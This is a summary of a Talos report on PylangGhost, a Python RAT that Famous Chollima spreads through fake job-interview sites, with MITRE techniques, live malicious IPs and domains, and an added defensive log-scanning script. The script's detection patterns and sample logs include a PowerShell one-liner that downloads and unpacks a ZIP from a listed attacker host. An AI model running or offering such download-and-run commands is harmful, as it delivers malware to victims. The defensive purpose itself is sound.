Cisco Talos uncovered a new Python-based remote access trojan (RAT) named PylangGhost, used exclusively by the North Korean-aligned threat actor Famous Chollima to target Windows users in the cryptocurrency and blockchain sectors. This Python RAT is functionally similar to the GolangGhost RAT, which targets macOS, and both are deployed via fake job interview websites that trick victims into running malicious commands. #PylangGhost #GolangGhost #FamousChollima
Keypoints
- Cisco Talos identified PylangGhost, a Python-based RAT variant used by Famous Chollima, a North Korean-aligned threat actor, targeting Windows systems.
- The RAT is functionally similar to GolangGhost, previously used against macOS; both versions steal credentials from over 80 browser extensions, including cryptocurrency wallets.
- Attacks utilize fake job interview websites impersonating companies such as Coinbase, Robinhood, and Uniswap to target professionals in cryptocurrency and blockchain fields.
- Victims are instructed to copy and execute malicious commands that install a trojan disguised as video drivers; the payload served is selected according to the victim's OS and browser fingerprint.
- PylangGhost consists of six Python modules that enable system persistence, remote control, data theft, and encrypted command and control communication using RC4.
- The campaign primarily targets individuals in India; Cisco telemetry has not detected any affected Cisco customers.
- Cisco security products like Secure Endpoint, Secure Email, and Umbrella can detect and block this threat effectively.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – Initial execution relies on the victim copying a malicious command line into a shell and running it (“…user to copy, paste and execute a command…”).
- [T1105] Ingress Tool Transfer – The payload and modules are downloaded using PowerShell Invoke-WebRequest or curl commands (“…to download a ZIP file containing the PylangGhost modules…”).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – PylangGhost creates a registry value to persist and launch on user logon (“It creates a registry value to launch the RAT every time user logs onto the system…”).
- [T1027] Obfuscated Files or Information – Modules are packed in a ZIP archive and launched with a renamed Python interpreter to evade detection (“…unzipping the Python library stored in the lib.zip file and launching the trojan…”).
- [T1071.001] Application Layer Protocol: Web Protocols – Communication with C2 server uses HTTP with RC4 encrypted packets (“…using RC4 encryption to encrypt packets over otherwise unencrypted HTTP…”).
- [T1213] Data from Information Repositories – Theft of credentials and cookies from over 80 browser extensions and password managers (“…theft of cookies and credentials from over 80 browser extensions including Metamask…”).
- [T1106] Execution Through API – The RAT runs commands and opens an OS shell for remote control (“…launch an OS shell for remote access and control of the infected system…”).
Indicators of Compromise
- [SHA256 Hashes] Python modules and associated files – e.g., a206ea9b415a0eafd731b4eec762a5b5e8df8d9007e93046029d83316989790a, c2137cd870de0af6662f56c97d27b86004f47b866ab27190a97bde7518a9ac1b.
- [C2 Servers] Command and control IP addresses – 31.57.243.29:8080, 154.58.204.15:8080, and others.
- [Download Domains] Malicious download hostnames used to serve payloads – api.quickcamfix.online, api.nvidia-release.us, api.autodriverfix.online, among others.
- [Fake Job Interview Domains] Domains hosting phishing and skill-testing pages – krakenhire.com, coinbase.talenthiringtool.com, robinhood.ecareerscan.com, uniswap.prehireiq.com, and many others.
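The following script is an added example, not code from the Talos write-up, showing how a defender might sweep Sysmon-style endpoint logs for the indicators and behaviours listed above: the SHA256 hashes, C2 endpoints and domains from the IoC section, a Run-key write (T1547.001), and a download-and-unpack one-liner of the kind described under T1059/T1105. The log lines are constructed for illustration; every hash, IP and hostname comes from this summary, and the file paths and SIDs are placeholders.

```python
"""Match Sysmon-style log lines against the PylangGhost IoCs and behaviours
listed in the summary above. Added example; the log lines are constructed."""
import re

# SHA256 hashes, C2 endpoints and hostnames quoted in the IoC section above.
IOC_HASHES = {
    "a206ea9b415a0eafd731b4eec762a5b5e8df8d9007e93046029d83316989790a",
    "c2137cd870de0af6662f56c97d27b86004f47b866ab27190a97bde7518a9ac1b",
}
IOC_C2 = [("31.57.243.29", "8080"), ("154.58.204.15", "8080")]
IOC_DOMAINS = [
    "api.quickcamfix.online", "api.nvidia-release.us", "api.autodriverfix.online",
    "krakenhire.com", "coinbase.talenthiringtool.com",
    "robinhood.ecareerscan.com", "uniswap.prehireiq.com",
]

# Behavioural pattern from the write-up: a one-liner that fetches a ZIP with
# Invoke-WebRequest or curl and then unpacks or launches it (T1105 -> T1059).
DOWNLOAD_RUN = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b).*\.zip.*(expand-archive|\bunzip\b|\btar\b|python)",
    re.IGNORECASE,
)
# Persistence through a registry Run key (T1547.001).
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)


def scan_line(line):
    """Return a list of (tag, indicator) findings for a single log line."""
    findings = []
    lower = line.lower()
    for h in IOC_HASHES:
        if h in lower:
            findings.append(("ioc-hash", h))
    for ip, port in IOC_C2:
        # Sysmon splits DestinationIp/DestinationPort; match both fields.
        if ip in line and port in line:
            findings.append(("T1071.001-c2", f"{ip}:{port}"))
    for d in IOC_DOMAINS:
        if d in lower:
            findings.append(("ioc-domain", d))
    if DOWNLOAD_RUN.search(line):
        findings.append(("T1105/T1059-download-run", "download-and-launch one-liner"))
    if RUN_KEY.search(line):
        findings.append(("T1547.001-runkey", "Run key write"))
    return findings


def scan(lines):
    """Scan every line; return (line_index, (tag, indicator)) pairs."""
    return [(i, f) for i, line in enumerate(lines) for f in scan_line(line)]


def techniques_seen(lines):
    """Set of tags observed across all lines, for a quick triage summary."""
    return {tag for _, (tag, _) in scan(lines)}


# Constructed Sysmon-style events (placeholders for paths, SIDs and file names).
SAMPLE_LOGS = [
    # 0: benign PowerShell, should produce no findings
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -c Get-Process"',
    # 1: download-and-unpack one-liner pulling a ZIP from a listed host
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -c Invoke-WebRequest https://api.quickcamfix.online/PLACEHOLDER.zip '
    '-OutFile lib.zip; Expand-Archive lib.zip"',
    # 2: Run key written for logon persistence
    'EventID=13 EventType=SetValue TargetObject=HKU\\S-1-5-21-PLACEHOLDER\\Software\\Microsoft'
    '\\Windows\\CurrentVersion\\Run\\PLACEHOLDER Details="C:\\Users\\user\\AppData\\Local\\Temp\\placeholder.exe"',
    # 3: outbound connection to a listed C2 endpoint
    'EventID=3 Image=C:\\Users\\user\\AppData\\Local\\Temp\\placeholder.exe '
    'DestinationIp=31.57.243.29 DestinationPort=8080 Protocol=tcp',
    # 4: process launched from a file whose hash is a listed IoC
    'EventID=1 Image=C:\\Users\\user\\AppData\\Local\\Temp\\placeholder.exe '
    'Hashes=SHA256=a206ea9b415a0eafd731b4eec762a5b5e8df8d9007e93046029d83316989790a',
]

if __name__ == "__main__":
    for idx, (tag, indicator) in scan(SAMPLE_LOGS):
        print(f"line {idx}: {tag} -> {indicator}")
```

Substring matching is deliberately loose so the same rules apply to raw text exports as well as parsed events; in production you would key each IoC to the field it belongs in (hash to `Hashes`, IP to `DestinationIp`) to avoid false hits, and the C2 port check alone is not a signal without the matching IP.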
Read more: https://blog.talosintelligence.com/python-version-of-golangghost-rat/